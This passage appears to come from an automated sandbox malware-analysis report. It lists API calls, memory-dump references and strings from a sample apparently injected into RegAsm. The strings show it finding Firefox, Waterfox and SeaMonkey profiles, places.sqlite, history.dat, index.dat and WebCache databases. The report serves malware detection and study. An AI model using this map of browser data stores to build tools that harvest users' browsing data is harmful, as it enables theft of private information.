                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-11920434

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 981974120-1717621600
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      • API String ID: 2925649097-2036018995
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProcessTimes
                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 116129598-3385500049
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                      • API String ID: 1475443563-435121686
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                      Memory Dump Source
